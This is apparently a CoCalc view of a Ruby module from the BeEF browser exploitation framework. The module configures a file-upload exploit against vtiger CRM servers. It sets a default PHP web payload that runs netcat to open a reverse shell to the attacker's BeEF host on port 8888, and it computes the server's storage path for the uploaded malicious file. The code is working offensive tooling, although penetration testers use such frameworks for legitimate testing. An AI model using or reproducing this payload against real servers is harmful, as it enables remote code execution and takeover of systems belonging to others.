CoCalc -- module.rb

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/vtiger_crm_upload_exploit/module.rb
¹¹⁵⁴ views
1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
class Vtiger_crm_upload_exploit < BeEF::Core::Command
7
  def self.options
8
    time = Time.new
9
    weekno = case time.day
10
             when 1..7 then 1
11
             when 8..14 then 2
12
             when 15..21 then 3
13
             when 22..28 then 4
14
             else 5
15
             end
16

17
    @configuration = BeEF::Core::Configuration.instance
18
    beef_host = @configuration.beef_host
19
    [
20
      { 'name' => 'vtiger_url', 'ui_label' => 'Target Web Server', 'value' => 'http://vulnerable-vtiger.site', 'width' => '400px' },
21
      { 'name' => 'vtiger_filepath', 'ui_label' => 'Target Directory', 'value' => "/storage/#{time.year}/#{time.strftime('%B')}/week#{weekno}/",
22
        'width' => '400px' },
23
      { 'name' => 'mal_filename', 'ui_label' => 'Malicious Filename', 'value' => rand(32**10).to_s(32), 'width' => '400px' },
24
      { 'name' => 'mal_ext', 'ui_label' => 'Malicious File Extension', 'value' => 'PHP', 'width' => '400px' },
25
      { 'name' => 'vtiger_php', 'ui_label' => 'Injected PHP (must escape single quotes)', 'value' => "<?php passthru(\"/bin/nc -e /bin/sh #{beef_host} 8888\"); ?>", 'type' => 'textarea',
26
        'width' => '400px', 'height' => '100px' },
27
      { 'name' => 'upload_timeout', 'ui_label' => 'Upload Timeout', 'value' => '5000' }
28
    ]
29
  end
30

31
  def post_execute
32
    return if @datastore['result'].nil?
33

34
    save({ 'result' => @datastore['result'] })
35
  end
36
end
37

38
Product

Resources

Company
